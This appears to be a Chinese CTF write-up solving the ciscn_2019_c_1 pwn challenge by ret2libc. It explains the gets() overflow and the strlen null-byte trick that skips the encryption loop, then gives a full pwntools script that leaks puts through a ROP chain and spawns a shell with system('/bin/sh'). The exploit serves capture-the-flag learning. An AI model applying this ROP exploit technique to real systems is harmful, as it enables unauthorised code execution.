当前位置: 首页 > news >正文

PWN手的成长之路-14-ciscn_2019_c_1-ret2libc

image

file:
image

checksec:
image

查看 main 函数:
image
image
image
再结合程序的运行,我们输入的值存到了 v4 中,当 v4=2 时,程序重新再次执行 begin() 函数,若输入 3,则直接退出程序,只有当我们输入 1 的时候,程序才会调用 encrypt() 函数。

查看 encrypt() 函数。gets() 读取输入并进入循环,通过 strlen(s) 获取用户输入的字节长度并对字符进行一系列异或操作。
image

发现存在 gets() 高危函数,猜测存在栈溢出漏洞。但是这道题没有 system("/bin/sh"),并且文件开启了 NX 保护,因此 ret2shellcode、ret2text基本排除了,所以只能是 ret2libc。

ret2libc 是不直接注入 shellcode (因为程序通常具有 NX 保护,栈不可知执行),而是通过利用程序自身加载的动态链接库(比如 libc.so)中的函数(如 system()、execve()等)来执行任意的代码。

但是这道题并没有给出 libc.so 文件,并且程序自身也没有 system 函数和 "/bin/sh" 字符串,所以就需要先泄露程序中的函数地址,再查询 libc 版本,并找到 system 函数和 "/bin/sh" 字符串的内存地址。

再分析 encrypt() 函数,strlen 函数是一个C库中的函数,主要用于计算以空字符 “\0”
为结尾的字符串长度,它会从传入的字符串开始检查每一个字符,直到遇到 “\0” 为止,然后返回遇到的字符串个数(其中不包括 "\0" 本身),例如:给定字符串 “hello”,strlen 函数会返回5,但是如果在字符串开头加上 "\0",那么此时 strlen 函数就会返回0,例如:输入字符串 "\0hello",strlen 函数就会返回0,因为 strlen 函数的机制就是遇到 "\0" 就停止计数,在 encrypt() 函数的后续有说明当 v0>= strlen(s),但是由于 strlen 返回的就是0,所以 v0>=strlen(s) 为假,条件不成立则跳出循环,即跳过了 encrypt 函数对字符串进行异或操作的逻辑,以达到 “破坏” 加密流程的目的(目的就是不让他进行加密操作)。

因为函数没有 system 、/bin/sh,所以攻击会变得较为复杂步骤:
1、泄露libc函数地址(puts)
2、计算其他libc函数地址(system)
3、构造ROP链(/bin/sh)

具体流程:先泄露 puts 函数 plt,再泄露 puts 函数 got 表,栈溢出覆盖返回地址,控制流程使其跳转到 puts@plt,设置 put 参数的内存地址为 got(即泄露 puts 在内存中的实际地址),再返回 main 函数,为什么是 main 函数,因为需要返回到可以再次触发漏洞的攻击函数,方便二次攻击。

再得到puts的真实地址后,使用得到puts地址并结合ibc数据库匹配相对应的libc版本,再计算其他函数的偏移地址。

最终exp(调试了快两天才最终于2025/10/12/14:40成功):

from pwn import *
from LibcSearcher import *#start
r = remote('node5.buuoj.cn',28626)
#r = process('./pwn')
elf = ELF('./pwn')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') #ldd pwn
context.log_level='debug'#params
rdi_addr = 0x400C83
ret_addr = 0x4006b9
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.sym['main']#attack
payload = b'a'*(0x50 + 8) + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.sendlineafter(b"choice",b'1')
r.sendline(payload)
puts_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
#puts_addr = u64(r.recvline()[:-1].ljust(8,b'\0'))
print(hex(puts_addr))#libc
libc = LibcSearcher("puts",puts_addr)
base_addr = puts_addr - libc.dump('puts')
system_addr = base_addr + libc.dump('system')
bin_sh_addr = base_addr + libc.dump('str_bin_sh')#base_addr = puts_addr - libc.symbols['puts']
#system_addr = base_addr + libc.symbols['system']
#bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))#attack2
payload2 = b'a'*(0x50+8) + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) +p64(system_addr)
r.sendlineafter(b'choice',b'1')
r.recvuntil(b'encrypted')
r.sendline(payload2)
r.interactive()

参考1000x_师傅的文章。

http://www.hskmm.com/?act=detail&tid=29325

相关文章:

  • 国内高速下载镜像
  • 2025数控高速滚齿机厂家权威推荐榜:精密加工与高效产能标杆
  • 完整教程:prompt提示词工程---如何让大模型更听得懂人话
  • 2025年10月广州 1688 代运营服务商推荐,阿里巴巴1688店铺代运营、全店托管代运营公司推荐!
  • 2025拉伸器厂家最新权威推荐榜:技术实力与市场口碑深度解析
  • 2025年10月工作服厂家最新推荐排行榜,春夏秋冬季工作服,工人工作服,车间工作服,防静电工作服公司推荐!
  • 2023-网鼎杯web-thinkshop
  • 2025活性氧化镁厂家最新权威推荐榜:高纯度与稳定性能深度解
  • Java的一些细节
  • 2025年CNC高压清洗机厂家权威推荐:高效清洁与耐用性能深
  • 从 EFI 到 GPT:深入理解现代计算机启动与磁盘分区技能
  • 2025年扁钢厂家最新权威推荐榜:强度与精度双重保障的工业脊
  • GJB 438C学习
  • typora markdown
  • 2025防爆数粒机厂家权威推荐榜:高效精准与安全防爆口碑之选
  • Linux系统设置与理解主机名(hostname)的重要性
  • CSharp: image covert webp using Aspose.Imaging
  • 2025耐磨轮胎厂家最新权威推荐榜:超强抓地力与持久耐用深度
  • 在Vue 3项目中集成Element Plus组件库的步骤
  • 安装pytorch(win 11 +3060 laptop)
  • MySQL数据库连接过多(Too many connections)错误处理策略
  • SQL删除操作性能分析:移除300万条记录所需时间估算
  • Spring Boot 基础教程 - 指南
  • Linux系统监控报告CPU软锁定问题(soft lockup)诊断方法
  • pytorch报告
  • Java语言操作INI配置文件策略
  • 【操作系统】Page Fault
  • 2025管件厂家最新权威推荐榜:技术实力与市场口碑深度解析
  • Java 软件报错之初
  • 投票